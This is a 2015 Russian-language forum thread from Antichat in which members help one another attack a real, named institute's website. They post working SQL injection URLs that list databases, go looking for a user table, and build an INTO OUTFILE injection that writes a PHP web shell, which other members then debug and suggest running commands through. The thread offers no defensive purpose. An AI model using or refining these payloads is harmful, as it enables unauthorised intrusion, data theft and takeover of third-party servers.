ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.03.2015, 00:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
лучше, только не та база(
лень перебрать пять строчек лимита?
Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
|
|
|
14.03.2015, 09:29
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от faza02
faza02 said:
лень перебрать пять строчек лимита?
Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(
|
|
|
|
14.03.2015, 10:05
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(
не понимаю. если вы не нашли вывод, откуда вы знаете, что эта таблица там есть?
вот ваша sqli:
Код:
Code:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte
database: projekte
Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
вывод: Archiv: projekte
т. е. серв mysql, вероятно, один.
|
|
|
|
14.03.2015, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 |
|
|
|
14.03.2015, 13:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 зачем текст шелла в кавычках и сверху еще hex?
у вас там и так все нормально льется.
Код:
Code:
union+select+1,2,%27%27,4,5,6,7+from+mysql.user+into+outfile+%27/usr/local/www/data/555.php%27--+
|
|
|
|
14.03.2015, 13:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 у Вас кавычки в гет параметра e неправильны еще в добавок! Вы с ворда наверно вставляли)
|
|
|
|
14.03.2015, 13:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от faza02
faza02 said:
у вас там и так все нормально льется.
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7
|
|
|
|
14.03.2015, 13:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
ну так попробуйте выполнить ls, например
|
|
|
|
14.03.2015, 13:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7
blank - пустой
Вы вызываете шелл-код с пустыми параметрами.
Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.
|
|
|
|
14.03.2015, 20:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке
site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид